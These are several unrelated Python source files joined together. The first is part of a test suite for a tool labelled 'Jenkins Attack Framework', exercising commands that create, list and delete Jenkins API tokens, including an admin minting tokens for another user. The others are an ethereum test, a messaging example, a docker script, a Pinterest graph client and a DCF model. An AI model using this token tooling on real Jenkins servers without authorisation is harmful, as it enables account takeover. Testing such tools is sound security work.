[r"- \w+: Invalid Credentials or unable to access Jenkins server."],
1,
)
def test_valid_jenkins_valid_unprivileged_creds(self):
"""Make sure that calling with valid jenkins (unprivileged creds) returns expected results"""
self.basic_test_harness(
["jaf.py", self.testcommand, "-s", server, "-a", user_noaccess],
[r"- \w+: Invalid Credentials or unable to access Jenkins server."],
1,
)
def test_valid_jenkins_valid_normal_creds_with_user_argument(self):
"""Make sure that calling with valid jenkins (normal creds) and user flag returns expected results"""
self.basic_test_harness(
["jaf.py", self.testcommand, "-s", server, "-a", user_normal, "-U", user_admin],
[r"- \w+: Invalid Credentials or unable to access Jenkins server."],
1,
)
class CreateAPITokenParserTest(unittest.TestCase, TestFramework):
def setUp(self):
self.testcommand = "CreateAPIToken"
self.TestClass = CreateAPIToken
self.TestParserClass = CreateAPITokenParser
def test_no_args(self):
"""Ensure that calling with no arguments results in help output and not an error"""
self.basic_test_harness(
["jaf.py", self.testcommand],
[
r"usage: jaf.py {0} \[-h\]".format(self.testcommand),
r"Jenkins Attack Framework",
r"positional arguments:",
],
)
class DeleteAPITokenTest(unittest.TestCase, TestFramework):
def setUp(self):
warnings.simplefilter("ignore", ResourceWarning)
self.testcommand = "DeleteAPIToken"
self.TestParserClass = DeleteAPITokenParser
self.TestClass = DeleteAPIToken
def test_invalid_url(self):
"""Make sure that calling with invalid url fails gracefully"""
self.basic_test_harness(
["jaf.py", self.testcommand, "-s", "https://127.0.0.1:59321/", "-a", user_bad],
[r"- \w+: Invalid Credentials or unable to access Jenkins server."],
1,
)
def test_valid_url_bad_protocol(self):
"""Make sure that calling with valid url (that isn't Jenkins or right protocol) fails gracefully"""
with DummyWebServer():
self.basic_test_harness(
["jaf.py", self.testcommand, "-s", "https://127.0.0.1:59322/", "-a", user_bad],
[r"- \w+: Invalid Credentials or unable to access Jenkins server."],
1,
)
def test_valid_url_and_protocol(self):
"""Make sure that calling with valid url (that isn't Jenkins but right protocol) fails gracefully"""
with DummyWebServer():
self.basic_test_harness(
["jaf.py", self.testcommand, "-s", "http://127.0.0.1:59322/", "-a", user_bad],
[r"- \w+: Invalid Credentials or unable to access Jenkins server."],
1,
)
def test_valid_jenkins_invalid_creds(self):
"""Make sure that calling with valid jenkins (but bad creds) fails gracefully"""
self.basic_test_harness(
["jaf.py", self.testcommand, "-s", server, "-a", user_bad],
[r"- \w+: Invalid Credentials or unable to access Jenkins server."],
1,
)
def test_valid_jenkins_anonymous_creds(self):
"""Make sure that calling with valid jenkins (but no creds)"""
self.basic_test_harness(
["jaf.py", self.testcommand, "-s", server],
[r"- \w+: Invalid Credentials or unable to access Jenkins server."],
1,
)
def test_valid_jenkins_valid_unprivileged_creds(self):
"""Make sure that calling with valid jenkins (unprivileged creds) returns expected results"""
self.basic_test_harness(
["jaf.py", self.testcommand, "-s", server, "-a", user_noaccess],
[r"- \w+: Invalid Credentials or unable to access Jenkins server."],
1,
)
def test_valid_jenkins_valid_normal_creds_with_user_argument(self):
"""Make sure that calling with valid jenkins (normal creds) and user flag returns expected results"""
self.basic_test_harness(
["jaf.py", self.testcommand, "-s", server, "-a", user_normal, "-U", user_admin],
[r"- \w+: Invalid Credentials or unable to access Jenkins server."],
1,
)
class DeleteAPITokenParserTest(unittest.TestCase, TestFramework):
def setUp(self):
self.testcommand = "DeleteAPIToken"
self.TestClass = DeleteAPIToken
self.TestParserClass = DeleteAPITokenParser
def test_no_args(self):
"""Ensure that calling with no arguments results in help output and not an error"""
self.basic_test_harness(
["jaf.py", self.testcommand],
[
r"usage: jaf.py {0} \[-h\]".format(self.testcommand),
r"Jenkins Attack Framework",
r"positional arguments:",
],
)
class ListAPITokensTest(unittest.TestCase, TestFramework):
def setUp(self):
warnings.simplefilter("ignore", ResourceWarning)
self.testcommand = "ListAPITokens"
self.TestParserClass = ListAPITokensParser
self.TestClass = ListAPITokens
def test_invalid_url(self):
"""Make sure that calling with invalid url fails gracefully"""
self.basic_test_harness(
["jaf.py", self.testcommand, "-s", "https://127.0.0.1:59321/", "-a", user_bad],
[r"- \w+: Invalid Credentials or unable to access Jenkins server."],
1,
)
def test_valid_url_bad_protocol(self):
"""Make sure that calling with valid url (that isn't Jenkins or right protocol) fails gracefully"""
with DummyWebServer():
self.basic_test_harness(
["jaf.py", self.testcommand, "-s", "https://127.0.0.1:59322/", "-a", user_bad],
[r"- \w+: Invalid Credentials or unable to access Jenkins server."],
1,
)
def test_valid_url_and_protocol(self):
"""Make sure that calling with valid url (that isn't Jenkins but right protocol) fails gracefully"""
with DummyWebServer():
self.basic_test_harness(
["jaf.py", self.testcommand, "-s", "http://127.0.0.1:59322/", "-a", user_bad],
[r"- \w+: Invalid Credentials or unable to access Jenkins server."],
1,
)
def test_valid_jenkins_invalid_creds(self):
"""Make sure that calling with valid jenkins (but bad creds) fails gracefully"""
self.basic_test_harness(
["jaf.py", self.testcommand, "-s", server, "-a", user_bad],
[r"- \w+: Invalid Credentials or unable to access Jenkins server."],
1,
)
def test_valid_jenkins_anonymous_creds(self):
"""Make sure that calling with valid jenkins (but no creds)"""
self.basic_test_harness(
["jaf.py", self.testcommand, "-s", server],
[r"- \w+: Invalid Credentials or unable to access Jenkins server."],
1,
)
def test_valid_jenkins_valid_unprivileged_creds(self):
"""Make sure that calling with valid jenkins (unprivileged creds) returns expected results"""
self.basic_test_harness(
["jaf.py", self.testcommand, "-s", server, "-a", user_noaccess],
[r"- \w+: Invalid Credentials or unable to access Jenkins server."],
1,
)
def test_valid_jenkins_valid_read_no_job_creds_token_list(self):
"""Make sure that calling CreateAPIToken with valid jenkins (read only [no job access] creds) returns expected results"""
self.testcommand = "ListAPITokens"
self.TestClass = ListAPITokens
self.TestParserClass = ListAPITokensParser
self.basic_test_harness(
["jaf.py", self.testcommand, "-s", server, "-a", user_read_no_job_access],
[r"Current API Tokens:"],
)
def test_valid_jenkins_valid_normal_creds_with_user_argument(self):
"""Make sure that calling with valid jenkins (normal creds) and user flag returns expected results"""
self.basic_test_harness(
["jaf.py", self.testcommand, "-s", server, "-a", user_normal, "-U", user_admin],
[r"- \w+: Invalid Credentials or unable to access Jenkins server."],
1,
)
class ListAPITokensParserTest(unittest.TestCase, TestFramework):
def setUp(self):
self.testcommand = "ListAPITokens"
self.TestClass = ListAPITokens
self.TestParserClass = ListAPITokensParser
def test_no_args(self):
"""Ensure that calling with no arguments results in help output and not an error"""
self.basic_test_harness(
["jaf.py", self.testcommand],
[
r"usage: jaf.py {0} \[-h\]".format(self.testcommand),
r"Jenkins Attack Framework",
r"positional arguments:",
],
)
class CombinedAPITokenNormalUserCredentialsTest(unittest.TestCase, TestFramework):
@classmethod
def setUpClass(cls):
cls.token_name = "testtoken" + "".join(
random.choices(string.ascii_letters + string.digits, k=26)
)
def test_1_valid_jenkins_valid_read_no_job_creds_token_create(self):
"""Make sure that calling CreateAPIToken with valid jenkins (read only [no job access] creds) returns expected results"""
self.testcommand = "CreateAPIToken"
self.TestClass = CreateAPIToken
self.TestParserClass = CreateAPITokenParser
self.basic_test_harness(
[
"jaf.py",
self.testcommand,
"-s",
server,
"-a",
user_read_no_job_access,
self.token_name,
],
[r"Your new API Token is: "],
)
def test_2_valid_jenkins_valid_read_no_job_creds_token_list(self):
"""Make sure that calling CreateAPIToken with valid jenkins (read only [no job access] creds) returns expected results"""
self.testcommand = "ListAPITokens"
self.TestClass = ListAPITokens
self.TestParserClass = ListAPITokensParser
self.basic_test_harness(
["jaf.py", self.testcommand, "-s", server, "-a", user_read_no_job_access],
[r"Token Name: " + self.token_name],
)
def test_3_valid_jenkins_valid_read_no_job_creds_token_delete_list(self):
"""Make sure that calling DeleteAPIToken with valid jenkins (read only [no job access] creds) returns expected results"""
self.testcommand = "DeleteAPIToken"
self.TestClass = DeleteAPIToken
self.TestParserClass = DeleteAPITokenParser
self.basic_test_harness(
["jaf.py", self.testcommand, "-s", server, "-a", user_read_no_job_access],
[r"Token Name: " + self.token_name],
)
def test_4_valid_jenkins_valid_read_no_job_creds_token_delete(self):
"""Make sure that calling DeleteAPIToken with valid jenkins (read only [no job access] creds) returns expected results"""
self.testcommand = "DeleteAPIToken"
self.TestClass = DeleteAPIToken
self.TestParserClass = DeleteAPITokenParser
self.basic_test_harness(
[
"jaf.py",
self.testcommand,
"-s",
server,
"-a",
user_read_no_job_access,
self.token_name,
],
[r"Token Deleted Successfully."],
)
# For now this is commented out because we can only test this on a cloudbees federated setup, which we don't have
'''
class CombinedAPITokenNormalUserCookieTest(unittest.TestCase, TestFramework):
"""
We need to specifically test auth with cookies because code has to do extra work to derive the logged-in user's username
"""
@classmethod
def setUpClass(cls):
cls.token_name = "testtoken" + "".join(
random.choices(string.ascii_letters + string.digits, k=26)
)
try:
js = jenkinslib.Jenkins(
server,
username=user_read_no_job_access.split(':')[0],
password=':'.join(user_read_no_job_access.split(':')[1:]),
timeout=30,
)
cls.cookie = js.get_cookie()
except Exception:
print(cls.cookie)
#Failure will cause tests to fail, so we ignore here
pass
def test_1_valid_jenkins_valid_read_no_job_creds_token_create(self):
"""Make sure that calling CreateAPIToken with valid jenkins (read only [no job access] creds) returns expected results"""
self.testcommand = "CreateAPIToken"
self.TestClass = CreateAPIToken
self.TestParserClass = CreateAPITokenParser
self.basic_test_harness(
[
"jaf.py",
self.testcommand,
"-s",
server,
"-a",
self.cookie,
self.token_name,
],
[r"Your new API Token is: "],
)
def test_2_valid_jenkins_valid_read_no_job_creds_token_list(self):
"""Make sure that calling CreateAPIToken with valid jenkins (read only [no job access] creds) returns expected results"""
self.testcommand = "ListAPITokens"
self.TestClass = ListAPITokens
self.TestParserClass = ListAPITokensParser
self.basic_test_harness(
[
"jaf.py",
self.testcommand,
"-s",
server,
"-a",
self.cookie,
],
[r"Token Name: " + self.token_name],
)
def test_3_valid_jenkins_valid_read_no_job_creds_token_delete_list(self):
"""Make sure that calling DeleteAPIToken with valid jenkins (read only [no job access] creds) returns expected results"""
self.testcommand = "DeleteAPIToken"
self.TestClass = DeleteAPIToken
self.TestParserClass = DeleteAPITokenParser
self.basic_test_harness(
[
"jaf.py",
self.testcommand,
"-s",
server,
"-a",
self.cookie,
],
[r"Token Name: " + self.token_name],
)
def test_4_valid_jenkins_valid_read_no_job_creds_token_delete(self):
"""Make sure that calling DeleteAPIToken with valid jenkins (read only [no job access] creds) returns expected results"""
self.testcommand = "DeleteAPIToken"
self.TestClass = DeleteAPIToken
self.TestParserClass = DeleteAPITokenParser
self.basic_test_harness(
[
"jaf.py",
self.testcommand,
"-s",
server,
"-a",
self.cookie,
self.token_name,
],
[r"Token Deleted Successfully."],
)
'''
class CombinedAPITokenAdminUserTest(unittest.TestCase, TestFramework):
@classmethod
def setUpClass(cls):
cls.token_name = "testtoken" + "".join(
random.choices(string.ascii_letters + string.digits, k=26)
)
def test_1_valid_jenkins_valid_admin_creds_token_create_other_user(self):
"""Make sure that calling CreateAPIToken with valid jenkins (admin creds) returns expected results"""
self.testcommand = "CreateAPIToken"
self.TestClass = CreateAPIToken
self.TestParserClass = CreateAPITokenParser
self.basic_test_harness(
[
"jaf.py",
self.testcommand,
"-s",
server,
"-a",
user_admin,
"-U",
user_read_no_job_access,
self.token_name,
],
[r"Your new API Token is: "],
)
def test_2_valid_jenkins_valid_admin_creds_token_list_other_user(self):
"""Make sure that calling CreateAPIToken with valid jenkins (admin creds) returns expected results"""
self.testcommand = "ListAPITokens"
self.TestClass = ListAPITokens
self.TestParserClass = ListAPITokensParser
self.basic_test_harness(
[
"jaf.py",
self.testcommand,
"-s",
server,
"-a",
user_admin,
"-U",
user_read_no_job_access,
],
[r"Token Name: " + self.token_name],
)
def test_3_valid_jenkins_valid_admin_creds_token_delete_list_other_user(self):
"""Make sure that calling DeleteAPIToken with valid jenkins (admin creds) returns expected results"""
self.testcommand = "DeleteAPIToken"
self.TestClass = DeleteAPIToken
self.TestParserClass = DeleteAPITokenParser
self.basic_test_harness(
[
"jaf.py",
self.testcommand,
"-s",
server,
"-a",
user_admin,
"-U",
user_read_no_job_access,
],
[r"Token Name: " + self.token_name],
)
def test_4_valid_jenkins_valid_admin_creds_token_delete_other_user(self):
"""Make sure that calling DeleteAPIToken with valid jenkins (admin creds) returns expected results"""
self.testcommand = "DeleteAPIToken"
self.TestClass = DeleteAPIToken
self.TestParserClass = DeleteAPITokenParser
self.basic_test_harness(
[
"jaf.py",
self.testcommand,
"-s",
server,
"-a",
user_admin,
"-U",
user_read_no_job_access,
self.token_name,
],
[r"Token Deleted Successfully."],
)
if __name__ == "__main__":
unittest.main()
|
56912
|
import pytest
from ethereum import tester
@pytest.mark.xfail
def test_get_block_by_hash(rpc_server, rpc_client, eth_coinbase):
block_number = rpc_client.get_block_number()
assert block_number == 0
to_addr = "0x" + tester.encode_hex(tester.accounts[1])
txn_hash = rpc_client.send_transaction(_from=eth_coinbase, to=to_addr, value=100)
assert txn_hash
txn_receipt = rpc_client.get_transaction_receipt(txn_hash)
block_hash = txn_receipt['blockHash']
block = rpc_client.get_block_by_hash(block_hash)
assert block
|
56936
|
from panini import app as panini_app
from panini.middleware.debug_middleware import DebugMiddleware
app = panini_app.App(
service_name="debug_middleware_example",
host="127.0.0.1",
port=4222,
)
message = {
"key1": "value1",
"key2": 2,
"key3": 3.0,
"key4": [1, 2, 3, 4],
"key5": {"1": 1, "2": 2, "3": 3, "4": 4, "5": 5},
"key6": {"subkey1": "1", "subkey2": 2, "3": 3, "4": 4, "5": 5},
"key7": None,
}
@app.task()
async def publish():
for _ in range(10):
await app.request(subject="some.publish.subject", message=message)
@app.listen("some.publish.subject")
async def receive_messages(msg):
return {"success": True}
if __name__ == "__main__":
app.add_middleware(DebugMiddleware, log_level="info")
app.start()
|
56939
|
import os
import pandas as pd
import re
import subprocess
df = pd.read_csv("analysis_output/base_image_version_count.csv")
print(df.head())
df = df[:25].copy()
java_version = []
for i in range(len(df)):
try:
run_cmd = "docker run " + df["base-image:version"][i] + " java -version"
result = subprocess.check_output(run_cmd, stderr=subprocess.STDOUT, shell=True)
result = result.decode("utf-8")
if "openjdk version" in result:
java_version.append(re.findall(r"openjdk version.*\"", result)[0])
elif "java version" in result:
java_version.append(re.findall(r"java version.*\"", result)[0])
else:
java_version.append("")
except subprocess.CalledProcessError as exc:
print("ERROR CODE", exc.returncode, exc.output)
java_version.append("")
df["java_version"] = java_version
print(df)
df.to_csv(r'analysis_output/base_image_version_count_java.csv', index=False)
|
56957
|
import json
import httplib2
from graphipy.graph.graph_base import BaseNode as Node, BaseEdge as Edge
class Pinterest:
def __init__(self, api):
self.access_token = api["access_token"]
# get a single user info in JSON format by username
def get_single_user(self, username):
url = "https://api.pinterest.com/v1/users/" + username + "/?access_token=" + self.access_token + \
"&fields=first_name%2Cid%2Clast_name%2Curl%2Caccount_type%2Cusername%2Cbio%2Ccounts%2Ccreated_at%2Cimage"
http = httplib2.Http()
response, content = http.request(url, method="GET")
result = json.loads(content.decode())
return result
# get a single board info in JSON format by board_url
def get_single_board(self, board_url):
url = "https://api.pinterest.com/v1/boards/" + board_url + "/?access_token=" + self.access_token + \
"&fields=id%2Cname%2Curl%2Ccounts%2Ccreated_at%2Ccreator%2Cdescription%2Cimage%2Cprivacy"
http = httplib2.Http()
response, content = http.request(url, method="GET")
result = json.loads(content.decode())
return result
# get a single pin info in JSON format by pin_id
def get_single_pin(self, pin_id):
url = "https://api.pinterest.com/v1/pins/" + pin_id + "/?access_token=" + self.access_token + \
"&fields=id%2Clink%2Cnote%2Curl%2Cattribution%2Cboard%2Ccolor%2Coriginal_link%2Ccounts%2Ccreated_at%2Ccreator%2Cimage%2Cmedia"
http = httplib2.Http()
response, content = http.request(url, method="GET")
result = json.loads(content.decode())
return result
# get all pins on one board in JSON format by board_url
def get_pins_from_board(self, board_url):
url = "https://api.pinterest.com/v1/boards/" + board_url + \
"/pins/?access_token=" + self.access_token + "&fields=id"
http = httplib2.Http()
response, content = http.request(url, method="GET")
result = json.loads(content.decode())
return result
# get the graph for a single user by username
def fetch_pinterest_user_by_username(self, graph, username):
result = self.get_single_user(username)
user = PinterestUser(result["data"])
graph.create_node(user)
# get the graph for a single board by board_url
def fetch_pinterest_board_by_url(self, graph, board_url):
board_result = self.get_single_board(board_url)
board = PinterestBoard(board_result["data"])
graph.create_node(board)
creator_username = board_result["data"]["creator"]["url"].split('/')[3]
user_result = self.get_single_user(creator_username)
user = PinterestUser(user_result["data"])
graph.create_node(user)
graph.create_edge(Edge(board.get_id(), user.get_id(), "CREATED_BY"))
graph.create_edge(Edge(user.get_id(), board.get_id(), "CREATED"))
pin_result = self.get_pins_from_board(board_url)
for pin in pin_result["data"]:
single_pin_result = self.get_single_pin(pin["id"])
single_pin = PinterestPin(single_pin_result["data"])
graph.create_node(single_pin)
graph.create_edge(Edge(board.get_id(), single_pin.get_id(), "HAS"))
graph.create_edge(Edge(single_pin.get_id(), board.get_id(), "ON"))
# get the graph for a single pin by pin_id
def fetch_pinterest_pin_by_id(self, graph, pin_id):
pin_result = self.get_single_pin(pin_id)
pin = PinterestPin(pin_result["data"])
graph.create_node(pin)
creator_username = pin_result["data"]["creator"]["url"].split('/')[3]
user_result = self.get_single_user(creator_username)
user = PinterestUser(user_result["data"])
graph.create_node(user)
graph.create_edge(Edge(pin.get_id(), user.get_id(), "CREATED_BY"))
graph.create_edge(Edge(user.get_id(), pin.get_id(), "CREATED"))
board_url = pin_result["data"]["board"]["url"].split(
'/')[3] + "/" + pin_result["data"]["board"]["url"].split('/')[4]
board_result = self.get_single_board(board_url)
board = PinterestBoard(board_result["data"])
graph.create_node(board)
graph.create_edge(Edge(pin.get_id(), board.get_id(), "ON"))
graph.create_edge(Edge(board.get_id(), pin.get_id(), "HAS"))
# get the graph for mine as user node
def fetch_pinterest_my_usernode(self, graph):
url = "https://api.pinterest.com/v1/me/?access_token=" + self.access_token + \
"&fields=first_name%2Cid%2Clast_name%2Curl%2Caccount_type%2Cusername%2Cbio%2Ccounts%2Ccreated_at%2Cimage"
http = httplib2.Http()
response, content = http.request(url, method="GET")
result = json.loads(content.decode())
user = PinterestUser(result["data"])
graph.create_node(user)
# get the graph of my boards
def fetch_pinterest_my_boards(self, graph):
url = "https://api.pinterest.com/v1/me/?access_token=" + self.access_token + \
"&fields=first_name%2Cid%2Clast_name%2Curl%2Cbio%2Caccount_type%2Ccounts%2Ccreated_at%2Cimage%2Cusername"
http = httplib2.Http()
response, content = http.request(url, method="GET")
result = json.loads(content.decode())
user = PinterestUser(result["data"])
graph.create_node(user)
url = "https://api.pinterest.com/v1/me/boards/?access_token=" + self.access_token + \
"&fields=id%2Cname%2Curl%2Ccounts%2Ccreated_at%2Ccreator%2Cdescription%2Cimage%2Cprivacy"
http = httplib2.Http()
response, content = http.request(url, method="GET")
result = json.loads(content.decode())
for myboard in result["data"]:
board = PinterestBoard(myboard)
graph.create_node(board)
graph.create_edge(Edge(board.get_id(), user.get_id(), "CREATED_BY"))
graph.create_edge(Edge(user.get_id(), board.get_id(), "CREATED"))
# get the graph of my pins
def fetch_pinterest_my_pins(self, graph):
url = "https://api.pinterest.com/v1/me/?access_token=" + self.access_token + \
"&fields=first_name%2Cid%2Clast_name%2Curl%2Cbio%2Caccount_type%2Ccounts%2Ccreated_at%2Cimage%2Cusername"
http = httplib2.Http()
response, content = http.request(url, method="GET")
result = json.loads(content.decode())
user = PinterestUser(result["data"])
graph.create_node(user)
url = "https://api.pinterest.com/v1/me/pins/?access_token=" + self.access_token + \
"&fields=id%2Clink%2Cnote%2Curl%2Cattribution%2Cboard%2Ccolor%2Coriginal_link%2Ccounts%2Ccreated_at%2Ccreator%2Cimage%2Cmedia"
http = httplib2.Http()
response, content = http.request(url, method="GET")
result = json.loads(content.decode())
for mypin in result["data"]:
pin = PinterestPin(mypin)
graph.create_node(pin)
graph.create_edge(Edge(pin.get_id(), user.get_id(), "CREATED_BY"))
graph.create_edge(Edge(user.get_id(), pin.get_id(), "CREATED"))
# get the graph of my followers
def fetch_pinterest_my_followers(self, graph):
url = "https://api.pinterest.com/v1/me/?access_token=" + self.access_token + \
"&fields=first_name%2Cid%2Clast_name%2Curl%2Caccount_type%2Cusername%2Cbio%2Ccounts%2Ccreated_at%2Cimage"
http = httplib2.Http()
response, content = http.request(url, method="GET")
result = json.loads(content.decode())
user = PinterestUser(result["data"])
graph.create_node(user)
url = "https://api.pinterest.com/v1/me/followers/?access_token=" + self.access_token + \
"&fields=first_name%2Cid%2Clast_name%2Curl%2Caccount_type%2Cusername%2Cbio%2Ccounts%2Ccreated_at%2Cimage"
http = httplib2.Http()
response, content = http.request(url, method="GET")
result = json.loads(content.decode())
for myfollower in result["data"]:
follower = PinterestUser(myfollower)
graph.create_node(follower)
graph.create_edge(Edge(user.get_id(), follower.get_id(), "FOLLOWED_BY"))
# get the graph of my following users
def fetch_pinterest_my_following_users(self, graph):
url = "https://api.pinterest.com/v1/me/?access_token=" + self.access_token + \
"&fields=first_name%2Cid%2Clast_name%2Curl%2Caccount_type%2Cusername%2Cbio%2Ccounts%2Ccreated_at%2Cimage"
http = httplib2.Http()
response, content = http.request(url, method="GET")
result = json.loads(content.decode())
user = PinterestUser(result["data"])
graph.create_node(user)
url = "https://api.pinterest.com/v1/me/following/users/?access_token=" + self.access_token + \
"&fields=first_name%2Cid%2Clast_name%2Curl%2Caccount_type%2Cusername%2Cbio%2Ccounts%2Ccreated_at%2Cimage"
http = httplib2.Http()
response, content = http.request(url, method="GET")
result = json.loads(content.decode())
for myfollowing in result["data"]:
following = PinterestUser(myfollowing)
graph.create_node(following)
graph.create_edge(Edge(user.get_id(), following.get_id(), "FOLLOWING"))
# get the graph of my following boards
def fetch_pinterest_my_following_boards(self, graph):
url = "https://api.pinterest.com/v1/me/?access_token=" + self.access_token + \
"&fields=first_name%2Cid%2Clast_name%2Curl%2Caccount_type%2Cusername%2Cbio%2Ccounts%2Ccreated_at%2Cimage"
http = httplib2.Http()
response, content = http.request(url, method="GET")
result = json.loads(content.decode())
user = PinterestUser(result["data"])
graph.create_node(user)
url = "https://api.pinterest.com/v1/me/following/boards/?access_token=" + self.access_token + \
"&fields=id%2Cname%2Curl%2Ccounts%2Ccreated_at%2Ccreator%2Cdescription%2Cimage%2Cprivacy"
http = httplib2.Http()
response, content = http.request(url, method="GET")
result = json.loads(content.decode())
for myfollowingboard in result["data"]:
followingboard = PinterestBoard(myfollowingboard)
graph.create_node(followingboard)
graph.create_edge(Edge(user.get_id(), followingboard.get_id(), "FOLLOWING"))
creator_username = myfollowingboard["creator"]["url"].split('/')[3]
creator_result = self.get_single_user(creator_username)
creator = PinterestUser(creator_result["data"])
graph.create_node(creator)
graph.create_edge(Edge(followingboard.get_id(), creator.get_id(), "CREATED_BY"))
graph.create_edge(Edge(creator.get_id(), followingboard.get_id(), "CREATED"))
board_url = myfollowingboard["url"].split(
'/')[3] + "/" + myfollowingboard["url"].split('/')[4]
pin_result = self.get_pins_from_board(board_url)
for pin in pin_result["data"]:
single_pin_result = self.get_single_pin(pin["id"])
single_pin = PinterestPin(single_pin_result["data"])
graph.create_node(single_pin)
graph.create_edge(Edge(followingboard.get_id(), single_pin.get_id(), "HAS"))
graph.create_edge(Edge(single_pin.get_id(), followingboard.get_id(), "ON"))
# User node of Pinterest
class PinterestUser(Node):
def __init__(self, result):
label = result["first_name"] + " " + result["last_name"]
Node.__init__(self, result["id"], label, "user")
self.username = result["username"]
self.first_name = result["first_name"]
self.last_name = result["last_name"]
self.bio = result["bio"]
self.account_type = result["account_type"]
self.url = result["url"]
self.image_url = result["image"]["60x60"]["url"]
self.created_at = result["created_at"]
self.pins_count = result["counts"]["pins"]
self.following_count = result["counts"]["following"]
self.followers_count = result["counts"]["followers"]
self.boards_count = result["counts"]["boards"]
# Board node of Pinterest
class PinterestBoard(Node):
def __init__(self, result):
Node.__init__(self, result["id"], result["name"], "board")
self.name = result["name"]
self.url = result["url"]
self.image_url = result["image"]["60x60"]["url"]
self.created_at = result["created_at"]
self.privacy = result["privacy"]
self.pins_count = result["counts"]["pins"]
self.collaborators_count = result["counts"]["collaborators"]
self.followers_count = result["counts"]["followers"]
self.description = result["description"]
# Pin node of Pinterest
class PinterestPin(Node):
def __init__(self, result):
Node.__init__(self, result["id"], "pin_" + result["id"], "pin")
self.url = result["url"]
self.image_url = result["image"]["original"]["url"]
self.link = result["link"]
self.media = result["media"]["type"]
self.original_link = result["original_link"]
self.created_at = result["created_at"]
self.note = result["note"]
self.color = result["color"]
self.saves = result["counts"]["saves"]
self.comments = result["counts"]["comments"]
|
56960
|
import numpy as np
import pandas as pd
from autodcf.models._base import AbstractDCF
from datetime import datetime
class DCF(AbstractDCF):
"""Class for flexible DCF.
Note that all _to_sales args take either an iterable or float. If given a float, the DCF will
use this constant across all time periods (ex: if given 0.45 for COGS, COGS will be 45% of sales
for all forecasted periods). If given iterable, the first value will be the value used for the first
year in the forecast and the last value will be the value used in the terminal year.
Args:
company (autodcf.company.Company): Company to do DCF analysis for.
sales_growth (Union[Iterable, float]): Iterable of sales growth numbers to iterate over or constant growth rate.
Values are in order, so first value in iterable applies to next sales period and
last value applies to last sales period in DCF. Note, if you want to have 5% sales growth, use 0.05.
discount_rate (float): Rate at which cash flow should be discounted.
terminal_growth_rate (float): Rate at which sales are estimated to grow after returning to normal profit levels.
window (int): Number of years until company returns to normal profit margins (terminal year).
cogs_to_sales (Union[Iterable, float]): COGS as % of sales.
sga_to_sales (Union[Iterable, float]): SGA as % of sales.
rd_to_sales (Union[Iterable, float]): R&D as % of sales.
da_to_sales (Union[Iterable, float]): Depreciation & amortization as % of sales. Assumes amortization is tax
deductible.
interest_to_sales (Union[Iterable, float]): Interest as % of sales.
tax_rate (float): Tax rate.
capex_to_sales (Union[Iterable, float]): Capex as % of sales.
change_in_nwc_to_change_in_sales (float): Ratio of how much net working capital must change to increase sales by
1 unit.
"""
def __init__(self,
company,
sales_growth,
discount_rate,
terminal_growth_rate,
window,
cogs_to_sales,
sga_to_sales,
rd_to_sales,
da_to_sales,
interest_to_sales,
tax_rate,
capex_to_sales,
change_in_nwc_to_change_in_sales,
terminal_discount_rate=None):
self._company = company
self._sales_growth = sales_growth
self._discount_rate = discount_rate
self._terminal_growth_rate = terminal_growth_rate
self._window = window
self._cogs_to_sales = cogs_to_sales
self._sga_to_sales = sga_to_sales
self._rd_to_sales = rd_to_sales
self._da_to_sales = da_to_sales
self._interest_to_sales = interest_to_sales
self._tax_rate = tax_rate
self._capex_to_sales = capex_to_sales
self._change_in_nwc_to_change_in_sales = change_in_nwc_to_change_in_sales
self._forecast = pd.DataFrame(index=np.arange(-1, self.window + 1))
self._terminal_discount_rate = discount_rate if terminal_discount_rate is None else terminal_discount_rate
@property
def company(self):
"""Company object to do DCF for."""
return self._company
@property
def sales_growth(self):
"""Numpy array of sales growth for each year until end of window."""
return self._sales_growth
@property
def discount_rate(self):
"""Discount rate to discount cash flow at."""
return self._discount_rate
@property
def terminal_discount_rate(self):
"""Discount rate after terminal year."""
return self._terminal_discount_rate
@property
def terminal_growth_rate(self):
"""Rate at which sales are expected to grow perpetually."""
return self._terminal_growth_rate
@property
def window(self):
"""Periods of normal sales growth until terminal growth rate takes over."""
return self._window
@property
def cogs_to_sales(self):
"""Cost of goods sold as a percentage of sales."""
return self._cogs_to_sales
@property
def sga_to_sales(self):
"""Selling, general, and administrative costs as a percentage of sales."""
return self._sga_to_sales
@property
def rd_to_sales(self):
"""Research and development costs as a percentage of sales."""
return self._rd_to_sales
@property
def da_to_sales(self):
"""Depreciation and amortization as a percentage of sales."""
return self._da_to_sales
@property
def interest_to_sales(self):
"""Interest expense as a percentage of sales."""
return self._interest_to_sales
@property
def tax_rate(self):
"""Effective tax rate for company."""
return self._tax_rate
@property
def capex_to_sales(self):
"""Capital expenditures as a percentage of sales."""
return self._capex_to_sales
@property
def change_in_nwc_to_change_in_sales(self):
"""How much net working capital is expected to need to increase for each dollar increase in sales."""
return self._change_in_nwc_to_change_in_sales
def _calculate_sales(self):
"""Calculate sales for window of growth.
Returns:
Numpy array with sales from each period in order.
"""
sales_growth = np.repeat(self.sales_growth, self.window + 1) if isinstance(self.sales_growth,
float) else self.sales_growth
initial_sales = self.company.income_statement.sales
return np.concatenate(([initial_sales], initial_sales * np.cumprod(1 + sales_growth)))
def _multiply_by_sales_percent(self, percent_of_sales):
"""Find values for stat in all periods given percent of sales stat accounts for.
Returns:
Pandas series with statistic multiplied by forecast Sales values.
"""
return self._forecast['Sales'] * percent_of_sales
def _calculate_free_cash_flow(self):
"""Calculate free cash flow for each period.
Returns:
Pandas Series with free cash flow for each period in forecast.
"""
return self._forecast['Net Income'] + self._forecast['D&A'] - self._forecast['Capex'] - self._forecast[
'Change in NWC']
def _discount_cash_flows(self):
"""Discount cash flows at given discount rate."""
discount_factors = np.array([1 / (1 + self.discount_rate) ** i for i in range(self.window + 1)])
return self._forecast.loc[0:, 'FCF'] * discount_factors
def forecast(self):
"""Get pandas dataframe with all info needed to complete forecast.
Returns:
forecast (pd.DataFrame): Pandas data frame with forecasted future income statements and discounted
free cash flows.
"""
self._forecast['Year'] = np.arange(datetime.now().year - 1, datetime.now().year + self.window + 1)
self._forecast['Sales'] = self._calculate_sales()
self._forecast['COGS'] = self._multiply_by_sales_percent(self.cogs_to_sales)
self._forecast['Gross Profit'] = self._forecast['Sales'] - self._forecast['COGS']
self._forecast['SG&A'] = self._multiply_by_sales_percent(self.sga_to_sales)
self._forecast['Operating Profit'] = self._forecast['Gross Profit'] - self._forecast['SG&A']
self._forecast['R&D'] = self._multiply_by_sales_percent(self.rd_to_sales)
self._forecast['EBITDA'] = self._forecast['Operating Profit'] - self._forecast['R&D']
self._forecast['D&A'] = self._multiply_by_sales_percent(self.da_to_sales)
